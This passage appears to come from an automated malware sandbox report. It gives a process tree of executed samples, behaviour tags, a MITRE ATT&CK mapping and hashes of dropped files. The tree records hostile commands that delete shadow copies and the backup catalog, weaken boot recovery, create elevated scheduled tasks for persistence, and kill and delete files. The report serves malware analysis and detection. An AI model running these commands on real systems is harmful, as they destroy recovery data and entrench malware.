                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:8128
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:3088
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:7444
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                wmic shadowcopy delete
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:3160
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7356 -ip 7356
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                            PID:860
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3729.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\3729.exe
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                            PID:5920
                                                                                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:6480
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                  PID:3772
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                    taskkill /im MSBuild.exe /f
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                                                    PID:7456
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                    timeout /t 6
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                    PID:5456
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\53EA.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\53EA.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                              • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                              PID:7400
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\hymqlM9AFW.bat"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:5220
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                                                                                                                                    chcp 65001
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:2496
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\w32tm.exe
                                                                                                                                                                                                                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:5388
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\w32tm.exe
                                                                                                                                                                                                                                                                                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:5836
                                                                                                                                                                                                                                                                                                        • C:\Windows\WindowsShell\explorer.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\WindowsShell\explorer.exe"
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                          PID:5784
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 1012 -ip 1012
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:3964
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\6F33.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\6F33.exe
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:6900
                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                          PID:7508
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                            DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7f1f6a95-8058-254a-82dc-c1565db9a937}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "0000000000000168" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                            PID:5824
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                            DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000014C" "ed30"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                            PID:6628
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8731.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\8731.exe
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                          PID:2256
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\93D4.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\93D4.exe
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:6768
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 280
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                              PID:2328
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:5860
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 880
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                PID:8052
                                                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                PID:8124
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 5860 -ip 5860
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                PID:7684
                                                                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                PID:7976
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:6648
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                    PID:6772
                                                                                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                      PID:7532
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:3252
                                                                                                                                                                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                          PID:5752
                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:2004
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:6816
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 6768 -ip 6768
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                              PID:6592
                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:2168
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                PID:6508
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\WindowsShell\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                PID:7092
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                schtasks.exe /create /tn "UltraMediaBurner" /sc ONLOGON /tr "'C:\Program Files (x86)\UltraMediaBurner\unins000\UltraMediaBurner.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                PID:5924
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\SysWOW64\C_IS2022\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                PID:2672
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\msedge\msedge.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                PID:7112
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 2384 -ip 2384
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                PID:4272
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                                                                                                schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\ProgramData\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\S-1-5-21-257790753-2419383948-818201544-1000\SystemAppData\cmd.exe'" /rl HIGHEST /f
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                PID:8084
                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                PID:7332
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2236 -ip 2236
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                PID:6160
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2236 -ip 2236
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                PID:7980
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 612 -ip 612
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                PID:3000
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 2236 -ip 2236
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                PID:3108
                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                                PID:2340
                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                                  MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                  PID:6880

                                                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                              T1031

                                                                                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1060

                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                                                                                                                              5
                                                                                                                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                                                                                                                              Disabling Security Tools

                                                                                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                                                                                              T1089

                                                                                                                                                                                                                                                                                                                              File Deletion

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1107

                                                                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                                                                              Impair Defenses

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1562

                                                                                                                                                                                                                                                                                                                              Install Root Certificate

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1130

                                                                                                                                                                                                                                                                                                                              Credential Access

                                                                                                                                                                                                                                                                                                                              Credentials in Files

                                                                                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                                                                                              T1081

                                                                                                                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                                                                                                                              Software Discovery

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1518

                                                                                                                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                                                                                                                              8
                                                                                                                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                                                                                                                              7
                                                                                                                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                              T1120

                                                                                                                                                                                                                                                                                                                              Remote System Discovery

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1018

                                                                                                                                                                                                                                                                                                                              Collection

                                                                                                                                                                                                                                                                                                                              Data from Local System

                                                                                                                                                                                                                                                                                                                              3
                                                                                                                                                                                                                                                                                                                              T1005

                                                                                                                                                                                                                                                                                                                              Command and Control

                                                                                                                                                                                                                                                                                                                              Web Service

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1102

                                                                                                                                                                                                                                                                                                                              Impact

                                                                                                                                                                                                                                                                                                                              Inhibit System Recovery

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1490

                                                                                                                                                                                                                                                                                                                              Service Stop

                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                              T1489

                                                                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\82d93c54-5db6-40b3-ab75-d48cebc8eb54\IIIIIIIIIIIIIIIIIIIII.dll
                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                e8641f344213ca05d8b5264b5f4e2dee

                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                96729e31f9b805800b2248fd22a4b53e226c8309

                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                85e82b9e9200e798e8f434459eacee03ed9818cc6c9a513fe083e72d48884e24

